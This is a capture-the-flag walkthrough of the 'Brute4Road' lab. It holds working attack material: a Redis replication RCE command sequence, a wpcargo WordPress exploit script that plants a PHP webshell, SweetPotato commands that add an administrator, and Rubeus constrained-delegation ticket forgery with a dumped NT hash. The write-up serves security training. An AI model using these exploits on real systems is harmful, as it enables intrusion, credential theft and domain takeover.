春秋云镜-Brute4Road
External Redis: unauthenticated access
After fscan finished, Redis turned out to be open and unauthenticated, but running with low privileges. I tried msf's redis_replication_cmd_exec to do the master/slave replication RCE, but it didn't succeed :(
msf6 > use exploit/linux/redis/redis_replication_cmd_exec
msf6 exploit(linux/redis/redis_replication_cmd_exec) > set rhosts 39.98.117.235
rhosts => 39.98.117.235
msf6 exploit(linux/redis/redis_replication_cmd_exec) > set rport 6379
rport => 6379
msf6 exploit(linux/redis/redis_replication_cmd_exec) > set lhost att-vps-ip
lhost => att-vps-ip
msf6 exploit(linux/redis/redis_replication_cmd_exec) > set srvhost att-vps-ip
srvhost => att-vps-ip
msf6 exploit(linux/redis/redis_replication_cmd_exec) > run
In the end I gave in and used redis-rogue-server, which is quite destructive; it can only be fired once, so if the shell drops just restart the target. Put your VPS in lhost.
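The wire exchange that both the msf module and redis-rogue-server drive, as an added example (not code from the writeup or from either tool): it encodes commands in RESP, decodes replies, parses INFO, and lists the config changes the replication trick relies on. The rogue master that answers the SYNC with a crafted .so is not included; the attacker IP/port, /tmp and exp.so are placeholders.

```python
import socket


def resp_encode(*args):
    """Encode a Redis command as a RESP array of bulk strings (what redis-cli sends)."""
    parts = [b"*%d\r\n" % len(args)]
    for a in args:
        b = a if isinstance(a, bytes) else str(a).encode()
        parts.append(b"$%d\r\n%s\r\n" % (len(b), b))
    return b"".join(parts)


def resp_decode(buf):
    """Decode one RESP reply; returns (value, unconsumed bytes).
    Error replies ('-...') come back as Exception objects rather than being raised,
    so a caller can log them and keep going.  Raises ValueError on incomplete input."""
    kind, end = buf[:1], buf.index(b"\r\n")
    line, rest = buf[1:end], buf[end + 2:]
    if kind == b"+":
        return line.decode(), rest
    if kind == b"-":
        return Exception(line.decode()), rest
    if kind == b":":
        return int(line), rest
    if kind == b"$":
        n = int(line)
        if n < 0:
            return None, rest
        if len(rest) < n + 2:
            raise ValueError("incomplete bulk string")
        return rest[:n], rest[n + 2:]
    if kind == b"*":
        items = []
        for _ in range(int(line)):
            item, rest = resp_decode(rest)
            items.append(item)
        return items, rest
    raise ValueError("not a RESP reply: %r" % buf[:16])


def parse_info(text):
    """Turn the bulk string returned by INFO into a dict, skipping '#' section headers."""
    out = {}
    for line in text.splitlines():
        if line and not line.startswith("#") and ":" in line:
            k, v = line.split(":", 1)
            out[k] = v
    return out


def replication_rce_commands(attacker_ip, attacker_port, module="exp.so", workdir="/tmp"):
    """The command sequence behind the master/slave replication technique: point the
    victim at a rogue master, make the RDB it receives land where MODULE LOAD can
    find it, load it, then detach.  Paths are placeholders; returns encoded commands."""
    return [
        resp_encode("SLAVEOF", attacker_ip, attacker_port),
        resp_encode("CONFIG", "SET", "dir", workdir),
        resp_encode("CONFIG", "SET", "dbfilename", module),
        resp_encode("MODULE", "LOAD", f"{workdir}/{module}"),
        resp_encode("SLAVEOF", "NO", "ONE"),
    ]


def probe(host, port=6379, timeout=5):
    """Live unauth check: PING, then INFO server.  Returns the parsed INFO dict,
    or the error reply (e.g. NOAUTH) if the instance demands a password."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(resp_encode("PING"))
        pong, _ = resp_decode(s.recv(4096))
        if isinstance(pong, Exception):
            return pong
        s.sendall(resp_encode("INFO", "server"))
        data = b""
        while True:
            chunk = s.recv(65536)
            if not chunk:
                raise ConnectionError("connection closed mid-reply")
            data += chunk
            try:
                reply, _ = resp_decode(data)
                break
            except ValueError:
                continue  # bulk string not fully received yet
        return parse_info(reply.decode())
```

probe() is the quick check: a "-NOAUTH" reply means the instance wants a password. Before sending replication_rce_commands, read CONFIG GET dir and CONFIG GET dbfilename and restore them afterwards; leaving the instance pointed at a bogus dump file is what makes the rogue-server approach destructive.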
Once the shell lands, upgrade it to a tty:
python -c 'import pty; pty.spawn("/bin/bash")'
Classic SUID privilege escalation.
Internal network: WordPress
wget our proxy client and fscan onto the box, then look at netstat -ano.
In this unstable shell, start frp like this, otherwise you never get the shell back:
nohup ./frpc -c ./frpc.toml >/dev/null 2>&1 &
[redis@centos-web01 db]$ netstat -ano
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State Timer
tcp 0 0 0.0.0.0:6379 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 172.22.2.7:34792 100.100.30.25:80 ESTABLISHED off (0.00/0/0)
tcp 0 14 172.22.2.7:59732 8.147.108.183:2333 ESTABLISHED on (0.20/0/0)
tcp 0 0 172.22.2.7:53566 100.100.0.19:80 TIME_WAIT timewait (47.44/0/0)
tcp 0 0 172.22.2.7:45904 100.100.202.194:443 TIME_WAIT timewait (58.71/0/0)
tcp 0 0 172.22.2.7:54816 100.100.80.92:8080 TIME_WAIT timewait (33.51/0/0)
tcp 0 0 172.22.2.7:48934 113.45.23.73:7100 ESTABLISHED keepalive (7054.55/0/0)
tcp 40 0 172.22.2.7:6379 8.147.108.183:41578 ESTABLISHED keepalive (130.27/0/0)
tcp 0 0 172.22.2.7:53502 100.100.0.19:80 TIME_WAIT timewait (32.44/0/0)
tcp6 0 0 :::80 :::* LISTEN off (0.00/0/0)
tcp6 0 0 :::21 :::* LISTEN off (0.00/0/0)
tcp6 0 0 ::1:25 :::* LISTEN off (0.00/0/0)
udp 0 0 0.0.0.0:68 0.0.0.0:* off (0.00/0/0)
udp 0 0 127.0.0.1:323 0.0.0.0:* off (0.00/0/0)
udp6 0 0 ::1:323 :::* off (0.00/0/0)
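A quick triage of that netstat output, as an added example rather than something from the writeup: which ports the box serves, which address it has on the internal side (that is where the 172.22.2.0/24 sweep below comes from), and which established connections go out to the internet. The sample is a subset of the output above; the "internal" ranges are my own choice (RFC 1918 plus 100.64/10, which covers the 100.100.x.x cloud-provider addresses in the listing).

```python
import ipaddress

# Subset of the netstat -ano output above (copied from the listing, not constructed).
SAMPLE = """\
Proto Recv-Q Send-Q Local Address Foreign Address State Timer
tcp 0 0 0.0.0.0:6379 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 172.22.2.7:34792 100.100.30.25:80 ESTABLISHED off (0.00/0/0)
tcp 0 14 172.22.2.7:59732 8.147.108.183:2333 ESTABLISHED on (0.20/0/0)
tcp 0 0 172.22.2.7:48934 113.45.23.73:7100 ESTABLISHED keepalive (7054.55/0/0)
tcp 40 0 172.22.2.7:6379 8.147.108.183:41578 ESTABLISHED keepalive (130.27/0/0)
tcp6 0 0 :::80 :::* LISTEN off (0.00/0/0)
tcp6 0 0 :::21 :::* LISTEN off (0.00/0/0)
udp 0 0 0.0.0.0:68 0.0.0.0:* off (0.00/0/0)
udp6 0 0 ::1:323 :::* off (0.00/0/0)
"""

# Chosen here as "internal": RFC 1918, CGNAT (the 100.100.x.x hosts above), loopback, link-local.
INTERNAL = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "100.64.0.0/10",
    "127.0.0.0/8", "::1/128", "fc00::/7", "fe80::/10",
)]


def split_addr(s):
    """'172.22.2.7:34792' -> ('172.22.2.7', 34792); ':::80' -> ('::', 80); a '*' port -> None."""
    host, _, port = s.rpartition(":")
    return host, (None if port == "*" else int(port))


def parse_netstat(text):
    """One dict per socket line; UDP lines have no State column, so state is '' for them."""
    rows = []
    for line in text.splitlines():
        f = line.split()
        if len(f) < 5 or not f[0].startswith(("tcp", "udp")):
            continue
        lhost, lport = split_addr(f[3])
        fhost, fport = split_addr(f[4])
        state = f[5] if f[0].startswith("tcp") else ""
        rows.append({"proto": f[0], "laddr": lhost, "lport": lport,
                     "faddr": fhost, "fport": fport, "state": state})
    return rows


def is_internal(addr):
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return True  # '*' and other wildcards are not remote peers
    return any(ip in n for n in INTERNAL)


def listeners(rows):
    """Ports the box offers: TCP sockets in LISTEN plus every UDP socket."""
    return sorted({(r["proto"], r["lport"]) for r in rows
                   if r["state"] == "LISTEN" or r["proto"].startswith("udp")})


def own_addresses(rows):
    """Non-wildcard, non-loopback local addresses: the subnet to scan next."""
    return sorted({r["laddr"] for r in rows
                   if r["laddr"] not in ("0.0.0.0", "::", "127.0.0.1", "::1")})


def external_peers(rows):
    """ESTABLISHED connections to non-internal addresses: our own frp/reverse-shell
    links plus anything else the host is talking to on the internet."""
    return sorted({(r["faddr"], r["fport"]) for r in rows
                   if r["state"] == "ESTABLISHED" and not is_internal(r["faddr"])})


if __name__ == "__main__":
    rows = parse_netstat(SAMPLE)
    print("listening:", listeners(rows))
    print("local addresses:", own_addresses(rows))
    print("external peers:", external_peers(rows))
```

The external-peer list is also what a defender reviewing this box would see: the 8.147.108.183 connections are the attacker's frp and Redis sessions, and anything unexplained there deserves a look.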
Network information
172.22.2.3 (internal: domain controller)
172.22.2.7 (the external-facing Redis box, our foothold)
172.22.2.16 (internal: MSSQL)
172.22.2.18 (internal: WordPress)
172.22.2.34 (internal host)
WordPress has an n-day: the script below writes a webshell, then connect to it with AntSword (蚁剑).
import binascii
import requests

# Magic string from the public wpcargo barcode.php PoC: when the barcode generator
# renders it as pixels and compresses the PNG, the deflate stream contains
# <?=$_GET[1]($_POST[2]);?> as literal bytes, so the "image" is also a valid PHP file.
payload = '2f49cf97546f2c24152b216712546f112e29152b1967226b6f5f50'

def encode_character_code(c: int):
    # one byte -> 8 "pixels": '1' for a set bit, 'x' for a clear bit
    return '{:08b}'.format(c).replace('0', 'x')

text = ''.join([encode_character_code(c) for c in binascii.unhexlify(payload)])[1:]
destination_url = 'http://172.22.2.18/'   # the internal WordPress host, reached via the proxy
cmd = 'ls'

# With sizefactor 1/11, each '1' becomes a single white pixel and each 'x' a single black pixel.
# filepath is attacker-controlled, so the PNG is written into the web root as webshell.php.
requests.get(
    f"{destination_url}wp-content/plugins/wpcargo/includes/barcode.php?text={text}&sizefactor=.090909090909&size=1&filepath=/var/www/html/webshell.php"
)

# The webshell is in place; run a command through it ($_GET[1] is the function, $_POST[2] its argument).
print(requests.post(
    f"{destination_url}webshell.php?1=system", data={"2": cmd}
).content.decode('ascii', 'ignore'))
Found the database connection info.
It yielded a flag and some passwords.
MSSQL
Brute-force it with the password list from above; the password is ElGNkOiC:
./fscan_amd64 -h 172.22.2.16 -m mssql -pwdf passwd.txt
Connect with MDUT.
To upload files, this option has to be enabled.
SweetPotato privilege escalation
Add a user through SweetPotato, put it in the local administrators group, then RDP in:
C:/Users/Public/sweetpotato.exe -a "net user aniale kita@0529 /add"
C:/Users/Public/sweetpotato.exe -a "net localgroup administrators aniale /add"
Inside the domain
systeminfo shows the host is domain-joined.
Upload mimikatz and dump hashes; among them is the MSSQLSERVER$ computer account.
MSSQLSERVER is configured with constrained delegation to the domain controller, so S4U can be used to obtain a high-privilege service ticket (ST) for the DC. It seems only its NTLM hash is usable, so we use Rubeus: asktgt turns the RC4 key (the NT hash) into a TGT for MSSQLSERVER$, and s4u uses that TGT to request a ticket to itself on behalf of Administrator (S4U2self), exchanges it for a ticket to CIFS/DC.xiaorang.lab (S4U2proxy), and injects the result with /ptt.
.\Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:3c6c0709e5d7f89d022b6792384d1371 /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap
.\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:CIFS/DC.xiaorang.lab /dc:DC.xiaorang.lab /ptt /ticket:<base64 TGT from the asktgt output above>
Then we own the DC. I forgot to save the last screenshot, and I don't really understand this part; I'll study it later.
type \\DC.xiaorang.lab\C$\Users\Administrator\flag\flag04.txt